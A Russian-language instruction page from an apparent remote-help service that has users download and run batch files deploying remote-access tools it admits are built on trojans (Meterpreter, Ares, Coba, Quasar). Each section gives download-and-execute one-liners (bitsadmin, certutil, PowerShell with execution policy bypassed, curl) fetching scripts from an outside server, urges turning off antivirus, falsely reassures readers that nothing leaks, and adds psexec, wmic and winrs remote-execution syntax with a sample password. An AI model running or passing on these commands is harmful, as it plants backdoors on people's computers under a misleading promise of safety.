Примечание. Желательно устанавливать продукты под учётной записью администратора компьютера/домена и приравненным к ним записям. Возможны баги на серверных операционных системах при нестандартных настройках их.
Данный проект предназначен для оказания удалённой компьютерной помощи пользователю в случае, если по каким-то причинам компьютерный мастер не может прийти в дом/офис. Помощь оказывается через выделенные сервера NIT.
Примечание. Для запуска этих программ на компьютере пользователя должны быть установлены .Net Framework 4, NIT TinyExclusion, NIT TinyExeFiles. Прежде, чем воспользоваться данной помощью, необходимо установить данные программы.
Примечание. Антивирусные программы будут воспринимать данное программное обеспечение как содержащее вирусы. Это действительно так. Все перечисленные ниже программы относятся к так называемой группе Remote Access Tool (средства удалённого доступа). Эти средства автоматически попадают в чёрные списки антивирусных программ как потенциально опасные (догадались почему?), и исключают из него только платные и условно-бесплатные сервисы (типа RMS, AnyDesk, TeamViewer и т.д.). Поскольку программисты искали бесплатное решение, пришлось брать за основу троянцы. Но пользователю беспокоится нечего. Программа скачивается, запускается на компьютере и остаётся активной только до первой перезагрузки. К тому же она хорошо детектируется любым антивирусом. Не запущенная программа вообще не представляет никакой опасности. Так что личные данные пользователя никуда не утекают, чего нельзя сказать о многих коммерческих продуктах...
Для получения помощи вначале уточните, какой программой будет пользоваться мастер. Данные программы не взаимозаменяемые, и только мастер может уточнить использование программы в каждом конкретном случае. Далее необходимо скачать и установить программу.
Способ 1 подходит, если вы сидите за компьютером, и можете скачивать файлы и устанавливать программы сами. Самый распространённый случай.
Способ 2 подходит, если вы имеете только удалённый консольный доступ к компьютеру или серверу, можете подавать ему команды из командной строки, но не обязательно имеете возможность получить ответ. Такое случается, например, когда вы «вдруг» потеряли доступ к удалённой машине Windows, а вам нужно срочно его восстановить. Более подробно об этих способах смотри файл nit-adjust-run.
Способ 1:
Загрузите файл по ссылке и запустите его в папке «Загрузки»:
http://distrib.netip6.ru:80/NIT/RAT/download.php?file=nit-meterpreter-remote-RAT.bat
Способ 2:
Последовательно выполните следующие команды на удалённом компьютере/сервере:
Команда 1:
bitsadmin.exe /Transfer RemoteEnable00 /DOWNLOAD /PRIORITY FOREGROUND http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-run-00.cmd C:\Users\Администратор\nit-RAT-meterpreter-run-00.cmd
(работает только в командных файлах или при виртуальном доступе), или
certutil.exe -urlcache -f http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-run-00.cmd C:\Users\Администратор\nit-RAT-meterpreter-run-00.cmd
(часто не запускается, блокируется антивирусом), или
powershell.exe -NoLogo -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-run-00.cmd' -OutFile 'C:\Users\Администратор\nit-RAT-meterpreter-run-00.cmd'
(требует установленного powershell 3.0+, Net Framework 4+), или
c:\Util\curl.exe http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-run-00.cmd -o C:\Users\Администратор\nit-RAT-meterpreter-run-00.cmd
(работает всегда, но требует предварительной настройки)
Команда 2:
cmd.exe /c C:\Users\Администратор\nit-RAT-meterpreter-run-00.cmd
Способ 1:
Загрузите файл по ссылке и запустите его в папке «Загрузки»:
http://distrib.netip6.ru:80/NIT/RAT/download.php?file=nit-ares-remote-RAT.bat
Способ 2:
Последовательно выполните следующие команды на удалённом компьютере/сервере:
Команда 1:
bitsadmin.exe /Transfer RemoteEnable00 /DOWNLOAD /PRIORITY FOREGROUND http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-ares-run-00.cmd C:\Users\Администратор\nit-RAT-ares-run-00.cmd
(работает только в командных файлах или при виртуальном доступе), или
certutil.exe -urlcache -f http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-ares-run-00.cmd C:\Users\Администратор\nit-RAT-ares-run-00.cmd
(часто не запускается, блокируется антивирусом), или
powershell.exe -NoLogo -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-ares-run-00.cmd' -OutFile 'C:\Users\Администратор\nit-RAT-ares-run-00.cmd'
(требует установленного powershell 3.0+, Net Framework 4+), или
c:\Util\curl.exe http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-ares-run-00.cmd -o C:\Users\Администратор\nit-RAT-ares-run-00.cmd
(работает всегда, но требует предварительной настройки)
Команда 2:
cmd.exe /c C:\Users\Администратор\nit-RAT-ares-run-00.cmd
Способ 1:
Загрузите файл по ссылке и запустите его в папке «Загрузки»:
http://distrib.netip6.ru:80/NIT/RAT/download.php?file=nit-coba-remote-RAT.bat
Способ 2:
Последовательно выполните следующие команды на удалённом компьютере/сервере:
Команда 1:
bitsadmin.exe /Transfer RemoteEnable00 /DOWNLOAD /PRIORITY FOREGROUND http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-coba-run-00.cmd C:\Users\Администратор\nit-RAT-coba-run-00.cmd
(работает только в командных файлах или при виртуальном доступе), или
certutil.exe -urlcache -f http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-coba-run-00.cmd C:\Users\Администратор\nit-RAT-coba-run-00.cmd
(часто не запускается, блокируется антивирусом), или
powershell.exe -NoLogo -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-coba-run-00.cmd' -OutFile 'C:\Users\Администратор\nit-RAT-coba-run-00.cmd'
(требует установленного powershell 3.0+, Net Framework 4+), или
c:\Util\curl.exe http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-coba-run-00.cmd -o C:\Users\Администратор\nit-RAT-coba-run-00.cmd
(работает всегда, но требует предварительной настройки)
Команда 2:
cmd.exe /c C:\Users\Администратор\nit-RAT-coba-run-00.cmd
Способ 1:
Загрузите файл по ссылке и запустите его в папке «Загрузки»:
http://distrib.netip6.ru:80/NIT/RAT/download.php?file=nit-QUASAR-remote-RAT.bat
Способ 2:
Последовательно выполните следующие команды на удалённом компьютере/сервере:
Команда 1:
bitsadmin.exe /Transfer RemoteEnable00 /DOWNLOAD /PRIORITY FOREGROUND http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Quasar-run-00.cmd C:\Users\Администратор\nit-RAT-Quasar-run-00.cmd
(работает только в командных файлах или при виртуальном доступе), или
certutil.exe -urlcache -f http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Quasar-run-00.cmd C:\Users\Администратор\nit-RAT-Quasar-run-00.cmd
(часто не запускается, блокируется антивирусом), или
powershell.exe -NoLogo -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Quasar-run-00.cmd' -OutFile 'C:\Users\Администратор\nit-RAT-Quasar-run-00.cmd'
(требует установленного powershell 3.0+, Net Framework 4+), или
c:\Util\curl.exe http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Quasar-run-00.cmd -o C:\Users\Администратор\nit-RAT-Quasar-run-00.cmd
(работает всегда, но требует предварительной настройки)
Команда 2:
cmd.exe /c C:\Users\Администратор\nit-RAT-Quasar-run-00.cmd
Данные программы используются только для внутренних тестов сервера и для помощи пользователям не используются. Пользователю их запускать ни в коем случае не нужно (возможна нестабильная работа компьютера).
Способ 1:
Загрузите файл по ссылке и запустите его в папке «Загрузки»:
http://distrib.netip6.ru:80/NIT/RAT/download.php?file=nit-meterpreter-local-RAT.bat
Способ 2:
Последовательно выполните следующие команды на удалённом компьютере/сервере:
Команда 1:
bitsadmin.exe /Transfer RemoteEnable00 /DOWNLOAD /PRIORITY FOREGROUND http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-loc-run-00.cmd C:\Users\Администратор\nit-RAT-meterpreter-loc-run-00.cmd
(работает только в командных файлах или при виртуальном доступе), или
certutil.exe -urlcache -f http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-loc-run-00.cmd C:\Users\Администратор\nit-RAT-meterpreter-loc-run-00.cmd
(часто не запускается, блокируется антивирусом), или
powershell.exe -NoLogo -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-loc-run-00.cmd' -OutFile 'C:\Users\Администратор\nit-RAT-meterpreter-loc-run-00.cmd'
(требует установленного powershell 3.0+, Net Framework 4+), или
c:\Util\curl.exe http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-meterpreter-loc-run-00.cmd -o C:\Users\Администратор\nit-RAT-meterpreter-loc-run-00.cmd
(работает всегда, но требует предварительной настройки)
Команда 2:
cmd.exe /c C:\Users\Администратор\nit-RAT-meterpreter-loc-run-00.cmd
Способ 1:
Загрузите файл по ссылке и запустите его в папке «Загрузки»:
http://distrib.netip6.ru:80/NIT/RAT/download.php?file=DnRn-RAT-Template.bat
Способ 2:
Последовательно выполните следующие команды на удалённом компьютере/сервере:
Команда 1:
bitsadmin.exe /Transfer RemoteEnable00 /DOWNLOAD /PRIORITY FOREGROUND http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Template-run-00.cmd C:\Users\Администратор\nit-RAT-Template-run-00.cmd
(работает только в командных файлах или при виртуальном доступе), или
certutil.exe -urlcache -f http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Template-run-00.cmd C:\Users\Администратор\nit-RAT-Template-run-00.cmd
(часто не запускается, блокируется антивирусом), или
powershell.exe -NoLogo -NoProfile -WindowStyle Normal -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri 'http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Template-run-00.cmd' -OutFile 'C:\Users\Администратор\nit-RAT-Template-run-00.cmd'
(требует установленного powershell 3.0+, Net Framework 4+), или
c:\Util\curl.exe http://distrib.netip6.ru:80/NIT/RAT/nit-RAT-Template-run-00.cmd -o C:\Users\Администратор\nit-RAT-Template-run-00.cmd
(работает всегда, но требует предварительной настройки)
Команда 2:
cmd.exe /c C:\Users\Администратор\nit-RAT-Template-run-00.cmd
Если у вас имеется физический или виртуальный доступ к консоли на целевых операционных системах Windows, всё просто — запускайте команды в консоли в указанной последовательности. Но часто такого доступа нет. Тогда нужно подать следующие команды на исходном компьютере из командной строки, в зависимости от того, какой протокол связи с целевым компьютером у вас работает.
В разных версиях операционных системах Windows по умолчанию работают различные службы. Наиболее универсальной, но одновременно самым неудобным способом будет запуск команд через программу WMIC.exe. Далее по универсальности идёт WinRM (практически все серверные операционные системы) и smb вызовы через psexec (операционные системы Windows 6.1). В любом случае вам нужно проверить, какой порт открыт на удалённой машине. Для WMIC это должен быть 135/tcp, для SMB — 445/tcp, и для WinRM — 5985/tcp. Открытые порты можно определить при помощи программы nmap.exe или Powershell.exe, а также psping.exe. Последняя предпочтительнее, поскольку не требует установки (как и psexec.exe).
ВНИМАНИЕ! Многие из этих программ определяются недобросовестными антивирусными вендорами как malware, хотя сами по себе они безопасны. Откажитесь от их использования, или запускайте программы при отключённой антивирусной защите на исходном и целевом компьютере.
Примечание. Как правило, данный раздел не применим к клиентским операционным системам Microsoft Windows, поскльку при их правильной настройке в них закрыты все входящие порты. Поэтому в этих системах администратору нужно сначала открыть порты и запустить службы (при помощи физического контакта), а уже потом пытаться получить к компьютерам удалённый доступ.
Запуск команды команда на целевом компьютере
осуществляется с помощью следующей конструкции:
psexec.exe \\Computer /u Администратор /p 0A9s8d7F /i /h команда
где Computer — имя или IP адрес компьютера, Администратор — логин пользователя (см. выше), 0A9s8d7F — его пароль. Ключи /i, /h исправляют ошибки запуска программы с повышенными привилегиями.
Запуск команды команда на целевом компьютере
осуществляется с помощью следующей конструкции:
wmic.exe /user:Администратор /password:0A9s8d7F /node:"Computer" process call create "команда"
де Computer — имя или IP адрес компьютера, Администратор — логин пользователя (см. выше), 0A9s8d7F — его пароль. Указание кавычек обязательно.
Примечание. Конструкция с указание пользователя и пароля не работает на локальном компьютере. Если WMIC.exe надо запустить от имени другого пользователя, необходимо опустить ключи /USER, /PASSWORD и запустить кострукцию при помощи runas.
Примечание. Данная конструкция не выдаёт эхо-ответ консоли команды, выполнение идёт «вслепую». Однако выдаётся код завершения програмимы, по которому можно определить, если что-то пошло не так. По умолчанию, при успешном завершении возвращается код 0.
ВАЖНО! Для успешного выполнения конструкции на исходной машины должен быть настроен параметр TrustedHosts ко всем подключаемым компьютерам. Без этого вызов команды winrs завершится ошибкой. Как и для чего настраивать параметр TrustedHosts, смотри в описании WinRM.
Запуск команды команда на целевом компьютере
осуществляется с помощью следующей конструкции:
winrs -r:Computer -u:Администратор -p:0A9s8d7F "команда"
где Computer — имя или IP адрес компьютера, Администратор — логин пользователя (см. выше), 0A9s8d7F — его пароль. Указание кавычек обязательно.